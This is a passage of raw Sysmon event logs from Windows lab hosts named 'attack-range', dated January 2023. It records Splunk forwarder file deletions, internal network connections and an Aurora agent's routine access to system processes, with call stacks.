Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D19CA762EAE9F0819F23580A84D55147,SHA256=A6AA95B165407181AF511DADF42FAA481AAD41BA2D633D4E2F7000C8EC362157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046058Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:36.727{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D35E96C9062110C01812D620249F5A3,SHA256=76CF405E09B6785EAE74FA23AA58F6606C896B795452399A8317BFD8F9684EC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:36.158{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=4A08B5A7F4A7174707C0828BF53D74FE,SHA256=8F9058E7A0CBD5FEB587C9E91D1B643A058386ADBF5893D6D870E643E0B67A6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046059Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:37.818{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7068BEC3A7FB402C916EF45AEB145DD3,SHA256=1102FA5F0CB3978C7347A25F1096BEF324A22964CA5A352883712067FCCC1FD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046061Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:38.906{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54D1C0C1AEB48450989389B19C3004C3,SHA256=342E6F64721B669E4E3D355100CBA8AA123D3E2A1357DFA6B0FECD199FF4D6A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018349Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:37.112{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50174-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018348Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:38.115{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=432ECC884B679F0934987307276105DC,SHA256=AC109778031A9149BC435AAEF22381BDC64906B8B925471136D88F2D86C271A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046060Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:36.605{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56450-false10.0.1.12-8000- 23542300x800000000000000046062Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:39.989{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC3D7F8208FBB4355DA77C59A10053AD,SHA256=BA2188DF2D0091E248FA84A6606ED71DA119AA96EBD8A076EEE137C9F321F1DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018350Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:39.181{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89676656B1C549EBE5FC6642F19B72FB,SHA256=DF8C854322C4F370F9210AFB918F6D8AC45C9D524D735D473E7BCB020F207929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018351Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:40.261{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E7C56558905173BDFFD61992CC3E3F8,SHA256=2A0AAC1450D19158CF3004D39E789D67E00AC53D9A579E2B6C4B2F56BB05DCF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018352Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:41.327{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C13169B12F037AE5720A7E1141BE43,SHA256=79424139EB95C6F3EF3FFFFB0D3D1B6E282586BF9C1F2CB46572CC0CE5B8D978,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046064Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:41.938{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046063Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:41.069{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=877C67F38B3AC5DE6154D4C6AF108328,SHA256=ACB51E0D7F347C0D835AD50123E0DF7DA5E8B2B8C257E6E0B94A245E64549CD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018384Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.774{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018383Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.771{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018382Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.769{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018381Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.762{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018380Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.758{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018379Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.757{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018378Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.755{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018377Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018376Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.746{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018375Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018374Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.741{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018373Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.734{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018372Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.730{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018371Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.728{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018370Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.719{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018369Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.717{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018368Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.705{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018367Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018366Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.676{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018365Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.660{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018364Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.651{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018363Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.643{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018362Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:42.637{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000018361Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 